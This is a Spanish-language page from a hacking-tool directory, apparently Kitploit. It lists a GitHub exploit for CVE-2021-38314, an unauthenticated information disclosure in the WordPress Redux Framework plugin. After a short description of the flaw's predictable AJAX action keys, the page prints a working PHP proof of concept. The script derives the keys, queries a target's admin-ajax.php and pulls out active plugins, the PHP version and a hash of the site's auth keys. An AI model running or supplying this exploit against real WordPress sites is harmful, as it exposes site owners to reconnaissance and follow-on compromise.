Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2021-38314 — cve-2021-38314 - Divulgación de información sensible no autenticada | Kitploit
Herramientas/GitHubGitHub/twseptian/cve-2021-38314
ReconocimientoAnálisis de VulnerabilidadesExplotaciónRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubtwseptian/cve-2021-38314

cve-2021-38314

cve-2021-38314 - Divulgación de información sensible no autenticada

Ver Repositorio
211hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

cve-2021-38314 - Divulgación de información sensible no autenticada

El plugin Gutenberg Template Library & Redux Framework <= 4.2.11 para WordPress registró varias acciones AJAX disponibles para usuarios no autenticados en la función includes en redux-core/class-redux-core.php que eran únicas para un sitio determinado, pero deterministas y predecibles, ya que se basaban en un hash md5 de la URL del sitio con un valor de sal conocido de '-redux' y un hash md5 del hash anterior con un valor de sal conocido de '-support'. Estas acciones AJAX podían utilizarse para recuperar una lista de plugins activos y sus versiones, la versión de PHP del sitio y un hash md5 sin sal del AUTH_KEY del sitio concatenado con el SECURE_AUTH_KEY [1][2]

Código fuente

root@kitploit:~
<?php
$target = "https://target.com";  
$key1 = md5("$target/-redux");
$key2 = file_get_contents("$target/wp-admin/admin-ajax.php?action=$key1");
$key3 = md5($key2. '-support');
$redux_code = file_get_contents("http://verify.redux.io/?hash=$key3&site=$target/");
echo file_get_contents("$target/wp-admin/admin-ajax.php?action=$key3&code=$redux_code");

Guardar como código fuente con extensión .php

Cómo ejecutar

uso

Referencias:

  • [1] "CVE - CVE-2021-38314", Mitre.org, 2021. [En línea]. Disponible: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38314. [Accedido: 15 de mayo de 2022]
  • [2] Rizaldi Wahaz, “Divulgación de información sensible no autenticada en [REDACTED]”, Medium, 25 de noviembre de 2021. [En línea]. Disponible: https://wahaz.medium.com/unauthenticated-sensitive-information-disclosure-at-redacted-2702224098c. [Accedido: 15 de mayo de 2022]
Descargar herramienta